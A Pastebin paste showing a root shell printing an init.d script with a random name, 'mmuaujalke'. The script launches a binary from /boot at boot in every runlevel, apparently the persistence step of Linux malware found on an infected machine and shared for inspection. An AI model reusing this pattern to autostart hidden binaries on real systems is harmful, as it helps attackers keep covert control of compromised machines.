Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [root@giomacdesk init.d]# cat mmuaujalke
- #!/bin/sh
- # chkconfig: 12345 90 90
- # description: mmuaujalke
- ### BEGIN INIT INFO
- # Provides: mmuaujalke
- # Required-Start:
- # Required-Stop:
- # Default-Start: 1 2 3 4 5
- # Default-Stop:
- # Short-Description: mmuaujalke
- ### END INIT INFO
- case $1 in
- start)
- /boot/mmuaujalke
- ;;
- stop)
- ;;
- *)
- /boot/mmuaujalke
- ;;
- esac
Advertisement
Add Comment
Please, Sign In to add comment